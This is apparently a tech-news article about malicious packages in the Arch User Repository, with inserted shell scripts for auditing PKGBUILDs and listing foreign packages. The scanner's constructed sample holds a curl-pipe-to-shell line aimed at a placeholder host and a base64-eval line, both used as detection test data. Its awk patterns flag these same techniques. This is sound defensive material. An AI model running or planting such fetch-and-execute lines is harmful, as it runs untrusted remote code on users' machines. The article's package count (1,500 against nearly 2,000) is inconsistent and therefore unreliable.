    Malicious apps got into the Arch User Repository – how to protect yourself

    By kirklandc008@gmail.com, June 17, 2026
    ZDNET’s key takeaways

    • The Arch User Repository was found to contain malicious apps.
    • This was discovered twice in the span of a week.
    • Users are warned to be vigilant, but there are other, easier ways to protect yourself.

    Researchers at software supply chain management company Sonatype found that the Arch User Repository contained about 1,500 malicious packages, the company said in a blog post updated June 12.

    “We continue to encourage all users of AUR packages to review all PKGBUILD and install script changes when updating, especially during this time. If you notice suspicious commits to a package that you use, please reach out to Arch staff via the aur-general mailing list with more information,” the Arch team said in a brief statement.

    This does not bode well for a repository that was created to dramatically increase the amount of software available to Arch (and Arch derivative) users.

    The AUR is essentially a way for developers to make new software available to users of Arch Linux before it is officially added to the Arch repositories. It’s a collection of package descriptions (named PKGBUILDs) that make it possible to compile a package from source code using the makepkg tool and then install the package via the Arch Linux package manager, pacman.
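    The Arch team's advice to review PKGBUILD and install script changes can be given a first pass mechanically. The script below is an added example, not code from the article or from Arch: `review_lines` and its patterns are generic review heuristics chosen here (they are not indicators from this incident), and the sample PKGBUILD with its `example.invalid` URLs is constructed.

```shell
#!/bin/sh
# Added example: flag lines in a PKGBUILD or .install file for manual review.
# A PKGBUILD is a shell script that makepkg executes; an install= scriptlet
# is run by pacman at install time. No hits does not mean the file is safe.

review_lines() {
  # $1: label for the output; stdin: file contents.
  # stdout: "label:line: [tag] text" for every line matching a heuristic.
  awk -v f="$1" '
    function hit(tag) { printf "%s:%d: [%s] %s\n", f, NR, tag, $0 }
    /^[ \t]*#/                                          { next }  # comments
    /(curl|wget)[^|]*\|[ \t]*(sudo[ \t]+)?(ba|z)?sh/    { hit("pipe-to-shell") }
    /base64[ \t]+(-d|--decode)/                         { hit("decode") }
    /(^|[ \t;&|])eval[ \t]/                             { hit("eval") }
    /^[ \t]*install=/                                   { hit("install-scriptlet") }
    /SKIP/                                              { hit("checksum-skip") }
    /http:\/\//                                         { hit("plain-http") }
  '
}

# Constructed sample PKGBUILD (hypothetical package, benign payload).
sample_pkgbuild() {
cat <<'EOF'
pkgname=example-tool
pkgver=1.0
pkgrel=1
arch=('x86_64')
source=("http://example.invalid/example-tool-1.0.tar.gz")
sha256sums=('SKIP')
install=example-tool.install
package() {
  curl -s https://example.invalid/setup | sh
  eval "$(echo ZWNobyBoaQ== | base64 -d)"
}
EOF
}

# Real use: review_lines PKGBUILD < PKGBUILD
sample_pkgbuild | review_lines PKGBUILD
```

    A `SKIP` checksum is normal for packages built from a version-control source, so treat each hit as a prompt to read that line, not as a verdict.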

    The thing about the AUR is that anyone can upload packages to it, and a group of Trusted Users is charged with keeping tabs on what goes in.

    You can see where this is going, right?

    Imagine you’re one of those volunteer Trusted Users charged with checking every app that is submitted to a repository. Now, imagine you’re a bad actor wanting to inject malware into that repository. You obfuscate the malware, submit the app as legit, and assume the Trusted Users won’t have time to dig through every line of your code. The Trusted User does a quick scan of your code and doesn’t see the obfuscation.

    Blamo! You’ve just added a malicious app to the AUR.

    Within the span of one week, roughly 1,500 malicious apps made their way into the repository, which means something has to change; otherwise, Arch (and Arch-based) users aren’t going to be able to trust the AUR. There have been no reports on what these malicious apps do, nor who submitted them.

    In the meantime, I have a few recommendations for Arch users.

    Uninstall, uninstall, uninstall

    First, you need to uninstall anything you’ve installed from the AUR, and hope that it’s not too late. At the moment, I have no idea how bad the malicious code is that made it into the AUR, so there’s no telling what damage it could do, or has already done, to your system(s).

    Fortunately, to remove the package, you can use pacman like so:

    sudo pacman -R PACKAGENAME

    Where PACKAGENAME is the package to be removed.

    Once you’ve done that, check to ensure the package has been removed with the command:

    pacman -Q

    The above command will list every package installed on your system. 
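    Because `pacman -Q` lists everything, the AUR builds still have to be picked out of that list. As an added example (not from the original article), this script condenses `pacman -Qmi` output, where `-m` limits the query to foreign packages; the function name, sample records and package names are constructed for illustration.

```shell
#!/bin/sh
# Added example: inventory "foreign" packages, i.e. packages not found in any
# configured sync repository. AUR builds land here, as does anything else
# that was built or installed locally, so review the list before removing.
# pacman -Q queries the local database, -m keeps foreign packages only,
# -i prints the detail record that foreign_report() condenses.

foreign_report() {
  # stdin: `pacman -Qi`-style records (LC_ALL=C keeps field labels English).
  # stdout: name, version, install date, install-scriptlet flag (tab separated).
  awk -F' : ' '
    { key = $1; sub(/[ \t]+$/, "", key) }
    key == "Name"           { name = $2 }
    key == "Version"        { ver  = $2 }
    key == "Install Date"   { date = $2 }
    key == "Install Script" { printf "%s\t%s\t%s\tscriptlet=%s\n", name, ver, date, $2 }
  '
}

# Constructed sample records (hypothetical package names), trimmed to the
# fields the function reads, so the example also runs without pacman.
SAMPLE_QMI='Name            : example-aur-tool
Version         : 1.4.2-1
Install Date    : Tue 16 Jun 2026 09:14:51 AM UTC
Install Script  : Yes

Name            : example-font-git
Version         : r212.abc1234-1
Install Date    : Mon 02 Mar 2026 06:30:02 PM UTC
Install Script  : No'

if command -v pacman >/dev/null 2>&1; then
  LC_ALL=C pacman -Qmi | foreign_report
else
  printf '%s\n' "$SAMPLE_QMI" | foreign_report
fi
```

    The install date shows which packages were built or updated most recently, and `scriptlet=Yes` marks packages that shipped an install script.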

    Stop using the AUR

    Next, stop using the AUR, at least until the developers and Trusted Users can come up with a solution to avoid this problem. Until they have found a way to make it safe, consider the AUR off-limits.

    After you’ve removed all of the packages and stopped using the AUR, do yourself a favor and use a tool like Wireshark to test for any suspicious outgoing traffic. If you spot something you don’t recognize, look it up. If it’s unknown or known to be related to malicious code, either block the outgoing traffic or reinstall your OS. 

    Do not take any chances.

    Adopt a universal package manager

    In place of the AUR, install Flatpak and install apps from there. With Flatpak, you’ll have tons of applications to install, so you won’t miss the AUR nearly as much as you think. You can install Flatpak with the command:

    sudo pacman -S flatpak

    After installation, add the Flathub repository with:

    flatpak remote-add --if-not-exists --user flathub https://dl.flathub.org/repo/flathub.flatpakrepo

    You can then install anything you need, like so:

    flatpak install PACKAGENAME

    Where PACKAGENAME is the name of a package found on Flathub. You’ll find that there are apps on Flathub that weren’t available in the AUR (even proprietary apps like Spotify and Slack).

    It’s a shame that bad actors can ruin something for everyone. While Arch Linux is a remarkably secure OS, the AUR is a different story. I’ve never been one to depend on the AUR (in fact, I rarely use it), so this doesn’t affect me nearly as much as it might affect those who do.

    To fix this issue, I would suggest that the AUR needs a much better system for verifying the integrity of submitted software. I realize that some would consider that an affront to what the AUR has been for years, but if issues like this continue, the AUR will wind up becoming a barren wasteland. 

    Nearly 2,000 malicious apps within a week is nothing to look away from. And even if the devs can issue an all-clear every time malicious apps are discovered, at some point, no one is going to trust the AUR, so something dramatic has to change.

    Even this Reddit thread from five years ago illustrates that this problem has been a concern for a long time. It also highlights the fact that the onus is on the user to check everything they install. To that, I would say, how are you going to attract new users if they are expected to inspect software they want to use for malicious code? The answer… You can’t.
